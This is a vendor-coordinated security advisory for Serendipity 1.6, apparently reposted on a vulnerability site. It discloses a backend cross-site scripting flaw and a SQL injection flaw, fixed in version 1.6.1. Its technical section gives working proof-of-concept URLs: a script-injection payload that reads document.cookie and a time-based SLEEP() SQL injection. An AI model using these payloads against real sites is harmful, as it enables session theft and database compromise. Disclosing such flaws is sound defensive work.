Serendipity 1.6 Cross Site Scripting / SQL Injection

2012.05.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

Advisory: Serendipity 1.6 Backend Cross-Site Scripting and SQL-Injection vulnerability Advisory ID: KORAMIS-ADV2012-001 Contact: security@koramis.de Author: Stefan Schurtz Affected Software: Successfully tested on Serendipity 1.6 Vendor URL: http://www.s9y.org Vendor Status: fixed ========================== Vulnerability Description: ========================== The Serendipity backend is prone to a Cross-Site Scripting and SQL-Injection vulnerability. ================== Technical Details: ================== // XSS http://[target]/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]='"</script><script>alert(document.cookie)</script> // SQL-Injection http://[target]/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[plugin_to_conf]=-1' OR SLEEP(10)=0 LIMIT 1--+ ========= Solution: ========= Upgrade to version 1.6.1 ==================== Disclosure Timeline: ==================== 21-Apr-2012 - informed developers 22-Apr-2012 - feedback from developer 08-May-2012 - fixed in version 1.6.1 ======== Credits: ======== Vulnerabilities found and advisory written by Stefan Schurtz (KORAMIS Security Team). =========== References: =========== http://www.koramis.com/advisories/2012/KORAMIS-ADV2012-001.txt http://blog.s9y.org/archives/240-Serendipity-1.6.1-released.html

References:

http://www.koramis.com/advisories/2012/KORAMIS-ADV2012-001.txt
http://blog.s9y.org/archives/240-Serendipity-1.6.1-released.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top